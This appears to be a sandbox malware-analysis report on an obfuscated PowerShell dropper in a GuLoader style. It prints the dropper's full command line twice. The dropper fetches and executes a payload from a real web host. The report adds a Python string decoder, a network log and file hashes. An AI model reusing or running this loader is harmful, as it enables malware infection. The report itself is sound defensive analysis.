"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hotnesses = 1;Function Letsind($Tideless){$Makroredigeringer=$Tideless.Length-$Hotnesses;$Forethoughted='Substring';For( $Labourage=5;$Labourage -lt $Makroredigeringer;$Labourage+=6){$Irreclaimably+=$Tideless.$Forethoughted.Invoke( $Labourage, $Hotnesses);}$Irreclaimably;}function Pert($Fordyrelserne){ . ($Afbankes) ($Fordyrelserne);}$reviewal=Letsind 'U,aakMDel,noBillezBelloiKlasslD ivel,acisaBreec/Aadse5T yll.Fugem0Demop Lnked(Ski.tW BaloiTh,gmnceib,dacarao KasewVibras Mngd ForstNDebatT,vern Grske1Filo 0Afsik.Virkn0Dille;Proco onfiWForbui kalvn Hin 6Monis4 brug;Li.fj Revitx,erop6Un,id4Silde;A gif Fikspr DirevRegav:,erin1Skubb2Borte1Lntag.Ation0Ostr.)Annul HandwGHoloteDonnecOpdknk VaskoOverh/Unsli2Fgtem0C,rpi1Eleva0pap,r0Nonna1Jigab0 Epi.1Hulde CubicFUk,udiBeshirNoncae P,nifGruppo .emaxPhr s/Afgha1Media2Komp 1Overg.H.ved0til m ';$Urbanites=Letsind 'As,ebU,uncas Ind ePansrr Defl-.orgeA CostgHolleeTransnSkakstCtg.h ';$Pjalte=Letsind 'Bret.hSki.tt.ecretSuperpGe ess Admi:Falbe/Bra.r/TilbawBevgewanapswNdhj,. Hyd.iFuldsn Ti,sn R spoTempev Mahaa kirktEmboli teksv ,cieeDisapbChemiu Kun iOptiml Bi,ldR latiShibbnHaardgTige.s agbuoUnlimlH,dsiuOprult igniiOrpheoRel,qnHumlesR gne. Taati,dstdn Insc/Misogw erdep decu-ForsvcSulphoChlo,nReraitendo,eDidy,n Pse.t Fe.e/RgninuUneugp .atalVic noD pola raved Re,es agoo/ rerogDecimrReinfa Detov Potai mau t Gl.kySocio_ EjerfhexapoBlaanrL,xicmPlattsBeund/ H mnhFersk/ Legud B,li/min mbDuper/Reseeg aric/SouseAEdgebrNo chc rupphHalurvTra iiandedsLge.ji BalltMurstoFedmerDupe..OutprcskydeuionisrPolyp ';$Traktementerne=Letsind ' Unvo>God v ';$Afbankes=Letsind 'UnmonicimbreS amexTvang ';$Purposelessly='Minimumslngderne105';$Udfrslers = Letsind 'Appe,eSyntoc,agerh Antiovaado ,ordi% UraeaExocrpSelvbpvoweld,nnekaNonfit TimuaTu.ul% Tegn\underv uinaiMorbrc isimtD lirrSammeeUn hasPei,esEnoli. 
SpecDTra,duTim tl Maro Forde&fagfo&Subtl DublseQuadrcHjer hSlopsoProje hu kotMonti ';Pert (Letsind 'Teakt$jac agChunal tjero AndebBredsabandalScale:ProprMPersoa Suppk ecanrApp ioSonnenDissoa orsovSmp,snRepubeVkkelsFarma=Baksp( ForecDiaphmU,ormdgkker Lagri/Su.prcTy.eb T.ll$ F reU Kl.dd,appafCatenrRo lls Co,nlPar ietupe,r Met,sWag a)Senne ');Pert (Letsind ' Ti.k$DegaggLejeklKlgtio Stavb Dru.aPercelDotty: nembKInt,rn Sel a H.rmsAktieeMaal.tBlidg=ceint$OlicoPAnnaljnabonaparallUdfoltshoeheHeadr.smrfes UpripSarinlSca,liSupertAmids(Potas$TanisTUnwalrgs ela,stenk IrretTandbeSpjtsmSe,vpeSimpln.roret ConteDorier Un qn DesmeBisam) R,gs ');$Pjalte=$Knaset[0];$Nskeforestillinger= (Letsind 'Lac r$ Bog.gDigitlRreddoM tapb Raa.a Re,alReifi: Uh,iLFiendaBel,tr Pye.dLimfai SocieG odlrIndta=NavneN ppuseSkjo wRugbr-,ukstOGoldebe terjPos.ceFatalc overtd.opk Brn.bSTa,niyScrutsP,ecotResiseSam.lmHabit.UnsizNfletteReinvtSlvvr. CopyWStirreU inobPejseC Udv,l oomii KateeHim.enOve.ot');$Nskeforestillinger+=$Makronavnes[1];Pert ($Nskeforestillinger);Pert (Letsind 'Fo bu$A,delL ,ndeaTilgnrDefild S.apiBlybaeUdd,irTelet.Mu.deHEndege UdfoaSgekrdRejseeCha crSkrfesGrafi[Super$T,ailURkkefrfrih b Bo,ka IschnKonsuischizt Axi.eSplensSkovm]Retsf=Tmmer$ OpvirVidere UlvevLeonii UnsceGossywHa,eraMijnhlPhlog ');$Skansion=Letsind 'yiddi$N ujaLTaxafa RuelrBrebldTitaniknoppe Fes r Sty,.NunnaDDiscooirredwDedicnVersel Hearo S icaDoombdMont,FNaturiFoderlSyntaeR adp(Bev,s$Z uglP BevijRac,saErhvelInosit Vi,keOsteo,Pan i$HaglbSKalcitBro.denepheuTebe.rpadrioH andpAaremaPrint) lige ';$Steuropa=$Makronavnes[0];Pert (Letsind 'Escur$DoktogNewfolAf,beoRatiobGourmaEnasalMiner:nona EAldoxlaldereplanlvMicepa umultQ,esto UnrernatiosVagilt Hjreo IntelClose=Bundg(BenvnTManjeeIntersPseu tUnfor-PagodPimmedaHypottDuodeh R.od Nars$ etanSRein.t rakkeExsiluv,jrprLaaneo Co,opTypeba L.em)Sygej ');while (!$Elevatorstol) {Pert (Letsind 'Pigst$ Flubg Rigsl Kar oornecbEn 
draAfmejlTabel:IntegTreconrFarmeaUpdrinOveresStubouL.rilbEugensNephet.ngolaRubannUnc mtRenitiChamoa,habbl synllZ,ocyyKrads=Dolo $OratotUncerrUdeeruPoucheMytil ') ;Pert $Skansion;Pert (Letsind 'For jS S mitFagsta F yvrUrf gtRaako-TndevSActinldysk,e PredeBibl.p apst Fr lu4 rocu ');Pert (Letsind ' Frui$ObstegSamm l DomsoP.ecobGa wraenemyl Scor: grocEEnerglSex.leDop iv antaDodokt Fr.coPl,ssrFilmks Afstt Opd.oS,enul Vaes=carbo(InforTAccepePrjsesRommatGaleo- gyroPTitanablandtEndrohBista Toldo$Hlka.SHirdmtexsufeRonkeuStie rKnucloTekstpSa.doaHerb.)Hyper ') ;Pert (Letsind 'Plusv$CompogMaa el E.ico Vibrb Scy.aF,onelArbor: ffaP A,esrNedl oEasygo A gifA.strnDarwieDoubtsRmebrs Tild=Over $ kemagAndrolChalioAksembFe,aea keralGramm:KjortdEpidei RadilPraireMullitRegr tDyrehaR,mstnFamilt Rub iBihulsSa kthMolar+Me,se+ enil% lddy$UdraaKStr,nnUdefia CentsRideseAd pttnon p.ar ejcToustoDistauSparsnSildetEpiph ') ;$Pjalte=$Knaset[$Proofness];}$Genudsendelses=293407;$Falmningens=30098;Pert (Letsind 'O eri$Sup,rgMorphlS.pploKvintbAktioaHoppel arat:S,iriRGodvii SupegLachrsFormidForbra ArmegGyl.esfusenmBiosan ,ultdAmal,e Mos nEkspleKlu.t Exo a=Carot Taa,nGSpreaeHalvftBesu.-ApoteCNri go Adj.nKir.etClavieA vignRi.tat.onde U.gra$S urnSBrugetMorgee Cla u No,srDuriao Purip.ogitaUdkog ');Pert (Letsind 'S,dde$OmstdgVengel CateoFictib ambra Kinllbedst:KvoteAOv ennTon,tt AccuiUdhalgS.umbrPositaUnso.mFejesmenglea DagstStraiiFordrcsosteainelol.arti Ledo= Da a Decel[Skde,SspuliyKlbehsSkatktSub.eeSolskmOnfre.ratelCP.scao T lenUngdov DataeKadarrCen.rtAnbef]Vitam:Kryst:graveF ViperParasoSdm.fmTele.BFish,aProclsBeforeNaboe6Lysti4 .verSs aggtBrndbrsmutti.uffinProtog Suic(Fryde$CanasRSkandiJordsgUndersgarladSta da LdstgHalsss udgm,lerdnKu etdHandleGaardnKons ePriso)Sleep ');Pert (Letsind '.aktu$ ThrogFurenl.orstoCel.ubThoraa .asslRall : Pap.F ,odeo ArgytGlosshCasseeEskadrChauvgIncoriBn.eslIn bilIgleraSe,ue Imdek=Arveo Misa[MandeS Kdf.yTilgisRagsotA,diteUnconmTerne.PolieTA.asteudk.pxPh totEkstr. 
B skEJ rdonTe,olc,ragtoSpg,rdR.bboiTrioinOocysgOsmir]Diffe:Stati: KlimA umuSNicotC talIFiredISlett.In knGBritoe SucrtSu,prSNonfotOndinrEquilifintenstnksgLyop (Diplo$EjerfAFor,an utletSuperi,eopogFruitrSmaasarimetmSystemLejeka,rbeetCranriNotarcBerl,aIn,fllBi,ta)Psoad ');Pert (Letsind ' Pent$ gonogCorynlKuvero ChaobStagnaTerpelLa er:SkrogHSp ctaBidenlBobblvFuglepCowboeA istnUdtrysPr,toiblyinoPr.donPeptoe.arkinLodsb=Neant$EmulsFYngveoBegratPi tihUndere A.oerPlumrghoodliIndenlF,omml GlobaC ast. W,edsKloakuSoftwbL,skns Konst HandrRegeniTaxamnSystegDokto(Asyla$,ustvGSklenepulven ImpruStoredStyr,sUnseneSarkinMoerid StateKraftlFuldlsHare,eOve,wsT,pir,t.avl$ ,adeFNovemaI erslP sitm RubinSmreri PelsnEmpirgImineeAzo,ynQuantsFi,al) Kors ');Pert $Halvpensionen;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\victress.Dul && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hotnesses = 1;Function Letsind($Tideless){$Makroredigeringer=$Tideless.Length-$Hotnesses;$Forethoughted='Substring';For( $Labourage=5;$Labourage -lt $Makroredigeringer;$Labourage+=6){$Irreclaimably+=$Tideless.$Forethoughted.Invoke( $Labourage, $Hotnesses);}$Irreclaimably;}function Pert($Fordyrelserne){ . ($Afbankes) ($Fordyrelserne);}$reviewal=Letsind 'U,aakMDel,noBillezBelloiKlasslD ivel,acisaBreec/Aadse5T yll.Fugem0Demop Lnked(Ski.tW BaloiTh,gmnceib,dacarao KasewVibras Mngd ForstNDebatT,vern Grske1Filo 0Afsik.Virkn0Dille;Proco onfiWForbui kalvn Hin 6Monis4 brug;Li.fj Revitx,erop6Un,id4Silde;A gif Fikspr DirevRegav:,erin1Skubb2Borte1Lntag.Ation0Ostr.)Annul HandwGHoloteDonnecOpdknk VaskoOverh/Unsli2Fgtem0C,rpi1Eleva0pap,r0Nonna1Jigab0 Epi.1Hulde CubicFUk,udiBeshirNoncae P,nifGruppo .emaxPhr s/Afgha1Media2Komp 1Overg.H.ved0til m ';$Urbanites=Letsind 'As,ebU,uncas Ind ePansrr Defl-.orgeA CostgHolleeTransnSkakstCtg.h ';$Pjalte=Letsind 'Bret.hSki.tt.ecretSuperpGe ess Admi:Falbe/Bra.r/TilbawBevgewanapswNdhj,. Hyd.iFuldsn Ti,sn R spoTempev Mahaa kirktEmboli teksv ,cieeDisapbChemiu Kun iOptiml Bi,ldR latiShibbnHaardgTige.s agbuoUnlimlH,dsiuOprult igniiOrpheoRel,qnHumlesR gne. Taati,dstdn Insc/Misogw erdep decu-ForsvcSulphoChlo,nReraitendo,eDidy,n Pse.t Fe.e/RgninuUneugp .atalVic noD pola raved Re,es agoo/ rerogDecimrReinfa Detov Potai mau t Gl.kySocio_ EjerfhexapoBlaanrL,xicmPlattsBeund/ H mnhFersk/ Legud B,li/min mbDuper/Reseeg aric/SouseAEdgebrNo chc rupphHalurvTra iiandedsLge.ji BalltMurstoFedmerDupe..OutprcskydeuionisrPolyp ';$Traktementerne=Letsind ' Unvo>God v ';$Afbankes=Letsind 'UnmonicimbreS amexTvang ';$Purposelessly='Minimumslngderne105';$Udfrslers = Letsind 'Appe,eSyntoc,agerh Antiovaado ,ordi% UraeaExocrpSelvbpvoweld,nnekaNonfit TimuaTu.ul% Tegn\underv uinaiMorbrc isimtD lirrSammeeUn hasPei,esEnoli. 
SpecDTra,duTim tl Maro Forde&fagfo&Subtl DublseQuadrcHjer hSlopsoProje hu kotMonti ';Pert (Letsind 'Teakt$jac agChunal tjero AndebBredsabandalScale:ProprMPersoa Suppk ecanrApp ioSonnenDissoa orsovSmp,snRepubeVkkelsFarma=Baksp( ForecDiaphmU,ormdgkker Lagri/Su.prcTy.eb T.ll$ F reU Kl.dd,appafCatenrRo lls Co,nlPar ietupe,r Met,sWag a)Senne ');Pert (Letsind ' Ti.k$DegaggLejeklKlgtio Stavb Dru.aPercelDotty: nembKInt,rn Sel a H.rmsAktieeMaal.tBlidg=ceint$OlicoPAnnaljnabonaparallUdfoltshoeheHeadr.smrfes UpripSarinlSca,liSupertAmids(Potas$TanisTUnwalrgs ela,stenk IrretTandbeSpjtsmSe,vpeSimpln.roret ConteDorier Un qn DesmeBisam) R,gs ');$Pjalte=$Knaset[0];$Nskeforestillinger= (Letsind 'Lac r$ Bog.gDigitlRreddoM tapb Raa.a Re,alReifi: Uh,iLFiendaBel,tr Pye.dLimfai SocieG odlrIndta=NavneN ppuseSkjo wRugbr-,ukstOGoldebe terjPos.ceFatalc overtd.opk Brn.bSTa,niyScrutsP,ecotResiseSam.lmHabit.UnsizNfletteReinvtSlvvr. CopyWStirreU inobPejseC Udv,l oomii KateeHim.enOve.ot');$Nskeforestillinger+=$Makronavnes[1];Pert ($Nskeforestillinger);Pert (Letsind 'Fo bu$A,delL ,ndeaTilgnrDefild S.apiBlybaeUdd,irTelet.Mu.deHEndege UdfoaSgekrdRejseeCha crSkrfesGrafi[Super$T,ailURkkefrfrih b Bo,ka IschnKonsuischizt Axi.eSplensSkovm]Retsf=Tmmer$ OpvirVidere UlvevLeonii UnsceGossywHa,eraMijnhlPhlog ');$Skansion=Letsind 'yiddi$N ujaLTaxafa RuelrBrebldTitaniknoppe Fes r Sty,.NunnaDDiscooirredwDedicnVersel Hearo S icaDoombdMont,FNaturiFoderlSyntaeR adp(Bev,s$Z uglP BevijRac,saErhvelInosit Vi,keOsteo,Pan i$HaglbSKalcitBro.denepheuTebe.rpadrioH andpAaremaPrint) lige ';$Steuropa=$Makronavnes[0];Pert (Letsind 'Escur$DoktogNewfolAf,beoRatiobGourmaEnasalMiner:nona EAldoxlaldereplanlvMicepa umultQ,esto UnrernatiosVagilt Hjreo IntelClose=Bundg(BenvnTManjeeIntersPseu tUnfor-PagodPimmedaHypottDuodeh R.od Nars$ etanSRein.t rakkeExsiluv,jrprLaaneo Co,opTypeba L.em)Sygej ');while (!$Elevatorstol) {Pert (Letsind 'Pigst$ Flubg Rigsl Kar oornecbEn 
draAfmejlTabel:IntegTreconrFarmeaUpdrinOveresStubouL.rilbEugensNephet.ngolaRubannUnc mtRenitiChamoa,habbl synllZ,ocyyKrads=Dolo $OratotUncerrUdeeruPoucheMytil ') ;Pert $Skansion;Pert (Letsind 'For jS S mitFagsta F yvrUrf gtRaako-TndevSActinldysk,e PredeBibl.p apst Fr lu4 rocu ');Pert (Letsind ' Frui$ObstegSamm l DomsoP.ecobGa wraenemyl Scor: grocEEnerglSex.leDop iv antaDodokt Fr.coPl,ssrFilmks Afstt Opd.oS,enul Vaes=carbo(InforTAccepePrjsesRommatGaleo- gyroPTitanablandtEndrohBista Toldo$Hlka.SHirdmtexsufeRonkeuStie rKnucloTekstpSa.doaHerb.)Hyper ') ;Pert (Letsind 'Plusv$CompogMaa el E.ico Vibrb Scy.aF,onelArbor: ffaP A,esrNedl oEasygo A gifA.strnDarwieDoubtsRmebrs Tild=Over $ kemagAndrolChalioAksembFe,aea keralGramm:KjortdEpidei RadilPraireMullitRegr tDyrehaR,mstnFamilt Rub iBihulsSa kthMolar+Me,se+ enil% lddy$UdraaKStr,nnUdefia CentsRideseAd pttnon p.ar ejcToustoDistauSparsnSildetEpiph ') ;$Pjalte=$Knaset[$Proofness];}$Genudsendelses=293407;$Falmningens=30098;Pert (Letsind 'O eri$Sup,rgMorphlS.pploKvintbAktioaHoppel arat:S,iriRGodvii SupegLachrsFormidForbra ArmegGyl.esfusenmBiosan ,ultdAmal,e Mos nEkspleKlu.t Exo a=Carot Taa,nGSpreaeHalvftBesu.-ApoteCNri go Adj.nKir.etClavieA vignRi.tat.onde U.gra$S urnSBrugetMorgee Cla u No,srDuriao Purip.ogitaUdkog ');Pert (Letsind 'S,dde$OmstdgVengel CateoFictib ambra Kinllbedst:KvoteAOv ennTon,tt AccuiUdhalgS.umbrPositaUnso.mFejesmenglea DagstStraiiFordrcsosteainelol.arti Ledo= Da a Decel[Skde,SspuliyKlbehsSkatktSub.eeSolskmOnfre.ratelCP.scao T lenUngdov DataeKadarrCen.rtAnbef]Vitam:Kryst:graveF ViperParasoSdm.fmTele.BFish,aProclsBeforeNaboe6Lysti4 .verSs aggtBrndbrsmutti.uffinProtog Suic(Fryde$CanasRSkandiJordsgUndersgarladSta da LdstgHalsss udgm,lerdnKu etdHandleGaardnKons ePriso)Sleep ');Pert (Letsind '.aktu$ ThrogFurenl.orstoCel.ubThoraa .asslRall : Pap.F ,odeo ArgytGlosshCasseeEskadrChauvgIncoriBn.eslIn bilIgleraSe,ue Imdek=Arveo Misa[MandeS Kdf.yTilgisRagsotA,diteUnconmTerne.PolieTA.asteudk.pxPh totEkstr. 
B skEJ rdonTe,olc,ragtoSpg,rdR.bboiTrioinOocysgOsmir]Diffe:Stati: KlimA umuSNicotC talIFiredISlett.In knGBritoe SucrtSu,prSNonfotOndinrEquilifintenstnksgLyop (Diplo$EjerfAFor,an utletSuperi,eopogFruitrSmaasarimetmSystemLejeka,rbeetCranriNotarcBerl,aIn,fllBi,ta)Psoad ');Pert (Letsind ' Pent$ gonogCorynlKuvero ChaobStagnaTerpelLa er:SkrogHSp ctaBidenlBobblvFuglepCowboeA istnUdtrysPr,toiblyinoPr.donPeptoe.arkinLodsb=Neant$EmulsFYngveoBegratPi tihUndere A.oerPlumrghoodliIndenlF,omml GlobaC ast. W,edsKloakuSoftwbL,skns Konst HandrRegeniTaxamnSystegDokto(Asyla$,ustvGSklenepulven ImpruStoredStyr,sUnseneSarkinMoerid StateKraftlFuldlsHare,eOve,wsT,pir,t.avl$ ,adeFNovemaI erslP sitm RubinSmreri PelsnEmpirgImineeAzo,ynQuantsFi,al) Kors ');Pert $Halvpensionen;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\victress.Dul && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
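The PowerShell command line above is a string-obfuscation dropper: every string literal is wrapped in `Letsind`, which walks the literal from offset 5 in steps of 6 and keeps one character per step (`$Hotnesses = 1`), stopping before the final padding character (`-lt $Length-1`); `Pert` is `. iex` once `$Afbankes` is decoded. The decoder below is an added example for this report, not code from the page or the sample; it ports `Letsind` to Python and pulls every `Letsind '...'` literal out of a script excerpt. The excerpt is copied from the command line above (the `$Udfrslers` literal is joined across the line break after "Enoli. "); the `$reviewal` literal is left out because this rendering appears to have collapsed repeated spaces inside it, which shifts the 6-character stride and garbles the decode. The function names `letsind` and `decode_letsind_literals` are this example's own.

```python
import re

# From the page's script: $Hotnesses = 1 is the Substring width.
HOTNESSES = 1


def letsind(s: str, width: int = HOTNESSES, start: int = 5, step: int = 6) -> str:
    """Port of the sample's Letsind function.

    PowerShell original:
      $max = $s.Length - $Hotnesses
      for ($i = 5; $i -lt $max; $i += 6) { $out += $s.Substring($i, $Hotnesses) }
    Every 6th character from offset 5 is kept.  The `-lt` bound drops the
    last (padding) character, so for width 1 this equals s[5:len(s)-1:6].
    """
    out = []
    i = start
    while i < len(s) - width:
        out.append(s[i:i + width])
        i += step
    return "".join(out)


def decode_letsind_literals(script: str) -> list[str]:
    """Decode every single-quoted argument passed to Letsind, in script order."""
    return [letsind(lit) for lit in re.findall(r"Letsind\s+'([^']*)'", script)]


# Excerpt copied verbatim from the powershell.exe command line in this report.
# (This example's own selection of literals; the literals themselves are the sample's.)
SAMPLE_SCRIPT = r"""$Urbanites=Letsind 'As,ebU,uncas Ind ePansrr Defl-.orgeA CostgHolleeTransnSkakstCtg.h ';$Pjalte=Letsind 'Bret.hSki.tt.ecretSuperpGe ess Admi:Falbe/Bra.r/TilbawBevgewanapswNdhj,. Hyd.iFuldsn Ti,sn R spoTempev Mahaa kirktEmboli teksv ,cieeDisapbChemiu Kun iOptiml Bi,ldR latiShibbnHaardgTige.s agbuoUnlimlH,dsiuOprult igniiOrpheoRel,qnHumlesR gne. Taati,dstdn Insc/Misogw erdep decu-ForsvcSulphoChlo,nReraitendo,eDidy,n Pse.t Fe.e/RgninuUneugp .atalVic noD pola raved Re,es agoo/ rerogDecimrReinfa Detov Potai mau t Gl.kySocio_ EjerfhexapoBlaanrL,xicmPlattsBeund/ H mnhFersk/ Legud B,li/min mbDuper/Reseeg aric/SouseAEdgebrNo chc rupphHalurvTra iiandedsLge.ji BalltMurstoFedmerDupe..OutprcskydeuionisrPolyp ';$Traktementerne=Letsind ' Unvo>God v ';$Afbankes=Letsind 'UnmonicimbreS amexTvang ';$Udfrslers = Letsind 'Appe,eSyntoc,agerh Antiovaado ,ordi% UraeaExocrpSelvbpvoweld,nnekaNonfit TimuaTu.ul% Tegn\underv uinaiMorbrc isimtD lirrSammeeUn hasPei,esEnoli. SpecDTra,duTim tl Maro Forde&fagfo&Subtl DublseQuadrcHjer hSlopsoProje hu kotMonti ';"""


if __name__ == "__main__":
    for decoded in decode_letsind_literals(SAMPLE_SCRIPT):
        print(decoded)
```

Run stand-alone it prints, in order, the header name `User-Agent`, the download URL on www.innovativebuildingsolutions.in (the host seen in the Network table below), the `>` separator the script later uses in `.Split` to build its URL list, `iex` (so `Pert` is `. iex`), and the `echo %appdata%\victress.Dul && echo t` command that matches the cmd.exe entries in the process tree. When applying this to another GuLoader-style command line, check the stride and start offset against that sample's own `For` loop first; they vary between builds, and any collapsed whitespace in a copied literal will desynchronise the decode.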
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.innovativebuildingsolutions.in | udp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| US | 8.8.8.8:53 | 98.58.21.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hutch.duniareligi.com | udp |
| ID | 202.43.173.180:443 | hutch.duniareligi.com | tcp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.173.43.202.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/2480-0-0x00007FFE7EF63000-0x00007FFE7EF65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zpntj2na.3ry.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2480-6-0x000002B8FE090000-0x000002B8FE0B2000-memory.dmp
memory/2480-11-0x00007FFE7EF60000-0x00007FFE7FA21000-memory.dmp
memory/2480-12-0x00007FFE7EF60000-0x00007FFE7FA21000-memory.dmp
memory/2896-15-0x0000000005150000-0x0000000005186000-memory.dmp
memory/2896-16-0x00000000057C0000-0x0000000005DE8000-memory.dmp
memory/2896-17-0x0000000005E70000-0x0000000005E92000-memory.dmp
memory/2896-18-0x0000000005F10000-0x0000000005F76000-memory.dmp
memory/2896-19-0x00000000060B0000-0x0000000006116000-memory.dmp
memory/2896-25-0x0000000006120000-0x0000000006474000-memory.dmp
memory/2896-30-0x00000000066F0000-0x000000000670E000-memory.dmp
memory/2896-31-0x0000000006720000-0x000000000676C000-memory.dmp
memory/2896-32-0x0000000007F80000-0x00000000085FA000-memory.dmp
memory/2896-33-0x0000000006C70000-0x0000000006C8A000-memory.dmp
memory/2896-34-0x00000000079A0000-0x0000000007A36000-memory.dmp
memory/2896-35-0x0000000007930000-0x0000000007952000-memory.dmp
memory/2896-36-0x0000000008BB0000-0x0000000009154000-memory.dmp
C:\Users\Admin\AppData\Roaming\victress.Dul
| MD5 | e55f25384365d8cb1cc6ffb71600ff50 |
| SHA1 | ffe4f34c419fd6dba313e21d53ce9b7ed309ee80 |
| SHA256 | d83c4794938826611110d3b660ae9876a5c17f8254f258cf4f64889db2c47b5e |
| SHA512 | 7f62e819c75ca50deb502dbf6b8301f926ef125d04ae0806cf50d9a76a31eddeb59142035a0e622e70e941b80769ee54abc1a64d4474f0a0ebba2023b988342c |
memory/2896-38-0x0000000009160000-0x000000000CEFE000-memory.dmp
memory/2480-39-0x00007FFE7EF63000-0x00007FFE7EF65000-memory.dmp
memory/2480-40-0x00007FFE7EF60000-0x00007FFE7FA21000-memory.dmp
memory/3156-48-0x0000000000EA0000-0x00000000020F4000-memory.dmp
memory/3156-50-0x0000000000EA0000-0x0000000000EE0000-memory.dmp
memory/3156-49-0x0000000000EA0000-0x00000000020F4000-memory.dmp
memory/2480-53-0x00007FFE7EF60000-0x00007FFE7FA21000-memory.dmp
memory/3156-55-0x0000000024950000-0x00000000249A0000-memory.dmp
memory/3156-56-0x0000000024A40000-0x0000000024AD2000-memory.dmp
memory/3156-57-0x0000000024940000-0x000000002494A000-memory.dmp